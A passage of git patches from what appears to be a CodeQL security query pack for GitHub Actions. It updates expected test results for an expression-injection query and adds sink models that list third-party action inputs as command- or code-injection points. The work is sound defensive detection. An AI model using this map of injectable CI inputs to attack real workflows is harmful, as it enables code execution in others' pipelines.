steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | 
@@ -254,7 +254,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | steps.step.outputs.value | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 21a9978c54f..d22e9833f52 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -44,10 +44,10 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | 
@@ -172,12 +172,12 @@ nodes | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | 
@@ -261,7 +261,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | From 446a2dc2673085a24960ad3f293e67f247d59cd5 Mon Sep 17 00:00:00 2001 
From: jorgectf Date: Wed, 13 Mar 2024 23:22:13 +0100 Subject: [PATCH 0096/1267] Add security sinks --- ql/lib/ext/8398a7_action-slack.model.yml | 6 +++++ ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 15 ++++++++++++ ...nnn_action-semantic-pull-request.model.yml | 6 +++++ ql/lib/ext/anchore_sbom-action.model.yml | 10 ++++++++ ql/lib/ext/anchore_scan-action.model.yml | 6 +++++ .../ext/andresz1_size-limit-action.model.yml | 9 +++++++ ql/lib/ext/asdf-vm_actions.model.yml | 6 +++++ .../axel-op_googlejavaformat-action.model.yml | 7 ++++++ ql/lib/ext/azure_powershell.model.yml | 6 +++++ ql/lib/ext/bahmutov_npm-install.model.yml | 6 +++++ .../blackducksoftware_github-action.model.yml | 8 +++++++ .../bufbuild_buf-breaking-action.model.yml | 6 +++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 5 ++++ .../ext/bufbuild_buf-setup-action.model.yml | 7 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 +++++ ql/lib/ext/changesets_action.model.yml | 7 ++++++ .../ext/cloudflare_wrangler-action.model.yml | 7 ++++++ .../crazy-max_ghaction-chocolatey.model.yml | 6 +++++ .../crazy-max_ghaction-import-gpg.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 8 +++++++ ql/lib/ext/cypress-io_github-action.model.yml | 6 +++++ .../ext/dailydotdev_action-devcard.model.yml | 7 ++++++ ...me_reportgenerator-github-action.model.yml | 6 +++++ .../daspn_private-actions-checkout.model.yml | 7 ++++++ .../dawidd6_action-ansible-playbook.model.yml | 7 ++++++ ...dawidd6_action-download-artifact.model.yml | 6 +++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 11 +++++++++ ...er-practice_actions-setup-docker.model.yml | 8 +++++++ ql/lib/ext/docker_build-push-action.model.yml | 6 +++++ ql/lib/ext/endbug_latest-tag.model.yml | 9 +++++++ ql/lib/ext/expo_expo-github-action.model.yml | 7 ++++++ ...seextended_action-hosting-deploy.model.yml | 6 +++++ 
ql/lib/ext/gabrielbb_xvfb-action.model.yml | 7 ++++++ ql/lib/ext/game-ci_unity-builder.model.yml | 7 ++++++ .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 6 +++++ .../ext/go-semantic-release_action.model.yml | 6 +++++ .../golangci_golangci-lint-action.model.yml | 6 +++++ .../ext/gonuit_heroku-docker-deploy.model.yml | 7 ++++++ .../goreleaser_goreleaser-action.model.yml | 6 +++++ ...te-or-update-pull-request-action.model.yml | 9 +++++++ ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 9 +++++++ ql/lib/ext/ilammy_setup-nasm.model.yml | 7 ++++++ ql/lib/ext/imjohnbo_issue-bot.model.yml | 8 +++++++ ql/lib/ext/iterative_setup-cml.model.yml | 6 +++++ ql/lib/ext/iterative_setup-dvc.model.yml | 6 +++++ ...sives_github-pages-deploy-action.model.yml | 11 +++++++++ .../ext/johnnymorganz_stylua-action.model.yml | 6 +++++ .../ext/jurplel_install-qt-action.model.yml | 11 +++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 7 ++++++ ql/lib/ext/leafo_gh-actions-lua.model.yml | 7 ++++++ .../ext/leafo_gh-actions-luarocks.model.yml | 6 +++++ .../lucasbento_auto-close-issues.model.yml | 6 +++++ ql/lib/ext/magefile_mage-action.model.yml | 6 +++++ ql/lib/ext/maierj_fastlane-action.model.yml | 8 +++++++ .../manusa_actions-setup-minikube.model.yml | 9 +++++++ ql/lib/ext/mattdavis0351_actions.model.yml | 9 +++++++ .../ext/meteorengineer_setup-meteor.model.yml | 6 +++++ ql/lib/ext/microsoft_setup-msbuild.model.yml | 7 ++++++ ...hers-excellent_docker-build-push.model.yml | 16 +++++++++++++ ql/lib/ext/msys2_setup-msys2.model.yml | 7 ++++++ ql/lib/ext/mxschmitt_action-tmate.model.yml | 7 ++++++ ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +++++ .../ext/nanasess_setup-chromedriver.model.yml | 6 +++++ ql/lib/ext/nanasess_setup-php.model.yml | 6 +++++ ql/lib/ext/nick-fields_retry.model.yml | 8 +++++++ ql/lib/ext/octokit_graphql-action.model.yml | 6 +++++ ql/lib/ext/octokit_request-action.model.yml | 6 +++++ ql/lib/ext/olafurpg_setup-scala.model.yml 
| 6 +++++ .../paambaati_codeclimate-action.model.yml | 6 +++++ .../peter-evans_create-pull-request.model.yml | 6 +++++ .../ext/plasmicapp_plasmic-action.model.yml | 8 +++++++ .../preactjs_compressed-size-action.model.yml | 7 ++++++ ql/lib/ext/py-actions_flake8.model.yml | 12 ++++++++++ ...py-actions_py-dependency-install.model.yml | 6 +++++ ql/lib/ext/pyo3_maturin-action.model.yml | 9 +++++++ ...vecircus_android-emulator-runner.model.yml | 24 +++++++++++++++++++ ql/lib/ext/reggionick_s3-deploy.model.yml | 13 ++++++++++ .../ext/renovatebot_github-action.model.yml | 10 ++++++++ .../ext/roots_issue-closer-action.model.yml | 7 ++++++ ql/lib/ext/ros-tooling_setup-ros.model.yml | 6 +++++ ql/lib/ext/ruby_setup-ruby.model.yml | 5 ++++ ...ction-detect-and-tag-new-version.model.yml | 5 ++++ ...skitionek_notify-microsoft-teams.model.yml | 6 +++++ ql/lib/ext/snow-actions_eclint.model.yml | 6 +++++ .../ext/stackhawk_hawkscan-action.model.yml | 10 ++++++++ .../ext/step-security_harden-runner.model.yml | 6 +++++ ql/lib/ext/tibdex_backport.model.yml | 9 +++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 15 ++++++++++++ .../tryghost_action-deploy-theme.model.yml | 7 ++++++ ql/lib/ext/veracode_veracode-sca.model.yml | 9 +++++++ .../ext/wearerequired_lint-action.model.yml | 8 +++++++ ql/lib/ext/webfactory_ssh-agent.model.yml | 8 +++++++ ql/lib/ext/zaproxy_action-baseline.model.yml | 9 +++++++ ql/lib/ext/zaproxy_action-full-scan.model.yml | 9 +++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 ++- 99 files changed, 719 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/8398a7_action-slack.model.yml create mode 100644 ql/lib/ext/amannn_action-semantic-pull-request.model.yml create mode 100644 ql/lib/ext/anchore_sbom-action.model.yml create mode 100644 ql/lib/ext/anchore_scan-action.model.yml create mode 100644 ql/lib/ext/andresz1_size-limit-action.model.yml create mode 100644 ql/lib/ext/asdf-vm_actions.model.yml 
create mode 100644 ql/lib/ext/axel-op_googlejavaformat-action.model.yml create mode 100644 ql/lib/ext/azure_powershell.model.yml create mode 100644 ql/lib/ext/bahmutov_npm-install.model.yml create mode 100644 ql/lib/ext/blackducksoftware_github-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-setup-action.model.yml create mode 100644 ql/lib/ext/changesets_action.model.yml create mode 100644 ql/lib/ext/cloudflare_wrangler-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml create mode 100644 ql/lib/ext/cycjimmy_semantic-release-action.model.yml create mode 100644 ql/lib/ext/cypress-io_github-action.model.yml create mode 100644 ql/lib/ext/dailydotdev_action-devcard.model.yml create mode 100644 ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml create mode 100644 ql/lib/ext/daspn_private-actions-checkout.model.yml create mode 100644 ql/lib/ext/dawidd6_action-ansible-playbook.model.yml create mode 100644 ql/lib/ext/dawidd6_action-download-artifact.model.yml create mode 100644 ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml create mode 100644 ql/lib/ext/docker-practice_actions-setup-docker.model.yml create mode 100644 ql/lib/ext/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/endbug_latest-tag.model.yml create mode 100644 ql/lib/ext/expo_expo-github-action.model.yml create mode 100644 ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml create mode 100644 ql/lib/ext/gabrielbb_xvfb-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-builder.model.yml create mode 100644 ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml create mode 100644 ql/lib/ext/go-semantic-release_action.model.yml create mode 100644 ql/lib/ext/golangci_golangci-lint-action.model.yml create mode 100644 ql/lib/ext/gonuit_heroku-docker-deploy.model.yml create mode 100644 ql/lib/ext/goreleaser_goreleaser-action.model.yml create mode 100644 
ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml create mode 100644 ql/lib/ext/ilammy_msvc-dev-cmd.model.yml create mode 100644 ql/lib/ext/ilammy_setup-nasm.model.yml create mode 100644 ql/lib/ext/imjohnbo_issue-bot.model.yml create mode 100644 ql/lib/ext/iterative_setup-cml.model.yml create mode 100644 ql/lib/ext/iterative_setup-dvc.model.yml create mode 100644 ql/lib/ext/jamesives_github-pages-deploy-action.model.yml create mode 100644 ql/lib/ext/johnnymorganz_stylua-action.model.yml create mode 100644 ql/lib/ext/jurplel_install-qt-action.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-lua.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-luarocks.model.yml create mode 100644 ql/lib/ext/lucasbento_auto-close-issues.model.yml create mode 100644 ql/lib/ext/magefile_mage-action.model.yml create mode 100644 ql/lib/ext/maierj_fastlane-action.model.yml create mode 100644 ql/lib/ext/manusa_actions-setup-minikube.model.yml create mode 100644 ql/lib/ext/meteorengineer_setup-meteor.model.yml create mode 100644 ql/lib/ext/microsoft_setup-msbuild.model.yml create mode 100644 ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml create mode 100644 ql/lib/ext/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/mxschmitt_action-tmate.model.yml create mode 100644 ql/lib/ext/nanasess_setup-chromedriver.model.yml create mode 100644 ql/lib/ext/nanasess_setup-php.model.yml create mode 100644 ql/lib/ext/nick-fields_retry.model.yml create mode 100644 ql/lib/ext/octokit_graphql-action.model.yml create mode 100644 ql/lib/ext/octokit_request-action.model.yml create mode 100644 ql/lib/ext/olafurpg_setup-scala.model.yml create mode 100644 ql/lib/ext/paambaati_codeclimate-action.model.yml create mode 100644 ql/lib/ext/peter-evans_create-pull-request.model.yml create mode 100644 ql/lib/ext/plasmicapp_plasmic-action.model.yml create mode 100644 ql/lib/ext/preactjs_compressed-size-action.model.yml create mode 100644 
ql/lib/ext/py-actions_flake8.model.yml create mode 100644 ql/lib/ext/py-actions_py-dependency-install.model.yml create mode 100644 ql/lib/ext/pyo3_maturin-action.model.yml create mode 100644 ql/lib/ext/reactivecircus_android-emulator-runner.model.yml create mode 100644 ql/lib/ext/reggionick_s3-deploy.model.yml create mode 100644 ql/lib/ext/renovatebot_github-action.model.yml create mode 100644 ql/lib/ext/roots_issue-closer-action.model.yml create mode 100644 ql/lib/ext/ros-tooling_setup-ros.model.yml create mode 100644 ql/lib/ext/skitionek_notify-microsoft-teams.model.yml create mode 100644 ql/lib/ext/snow-actions_eclint.model.yml create mode 100644 ql/lib/ext/stackhawk_hawkscan-action.model.yml create mode 100644 ql/lib/ext/step-security_harden-runner.model.yml create mode 100644 ql/lib/ext/tibdex_backport.model.yml create mode 100644 ql/lib/ext/tripss_conventional-changelog-action.model.yml create mode 100644 ql/lib/ext/tryghost_action-deploy-theme.model.yml create mode 100644 ql/lib/ext/veracode_veracode-sca.model.yml create mode 100644 ql/lib/ext/wearerequired_lint-action.model.yml create mode 100644 ql/lib/ext/webfactory_ssh-agent.model.yml create mode 100644 ql/lib/ext/zaproxy_action-baseline.model.yml create mode 100644 ql/lib/ext/zaproxy_action-full-scan.model.yml diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml new file mode 100644 index 00000000000..e3d97adf69d --- /dev/null +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 2ed2e03a34e..cd409f38b59 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/github-script","*","input.script","expression-injection"] + - ["actions/github-script", "*", "input.script", "code-injection"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index f370a9fe222..ad65775e58d 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -4,3 +4,18 @@ extensions: extensible: summaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml new file mode 100644 index 00000000000..c530a3af9b3 --- /dev/null +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"]
diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml
new file mode 100644
index 00000000000..c632a3a1ff2
--- /dev/null
+++ b/ql/lib/ext/anchore_sbom-action.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.format", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.path", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.file", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.image", "command-injection"]
diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml
new file mode 100644
index 00000000000..26e5adea505
--- /dev/null
+++ b/ql/lib/ext/anchore_scan-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["anchore/scan-action", "*", "input.grype-version", "command-injection"]
diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml
new file mode 100644
index 00000000000..2903888a731
--- /dev/null
+++ b/ql/lib/ext/andresz1_size-limit-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"]
+ - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"]
+ - ["andresz1/size-limit-action", "*", "input.script", "command-injection"]
+ - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"]
diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml
new file mode 100644
index 00000000000..21dcd22c8b7
--- /dev/null
+++ b/ql/lib/ext/asdf-vm_actions.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["asdf-vm/actions", "*", "input.before_install", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
new file mode 100644
index 00000000000..236eade34a6
--- /dev/null
+++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"]
+ - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"]
diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml
new file mode 100644
index 00000000000..c0e11c8201f
--- /dev/null
+++ b/ql/lib/ext/azure_powershell.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["azure/powershell", "*", "input.azPSVersion", "command-injection"]
diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml
new file mode 100644
index 00000000000..2841f406bda
--- /dev/null
+++ b/ql/lib/ext/bahmutov_npm-install.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"]
diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml
new file mode 100644
index 00000000000..aa060de610d
--- /dev/null
+++ b/ql/lib/ext/blackducksoftware_github-action.model.yml
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["blackducksoftware/github-action", "*", "input.args", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index ee8e6abef09..7d5f699a0e9 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"] + - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml 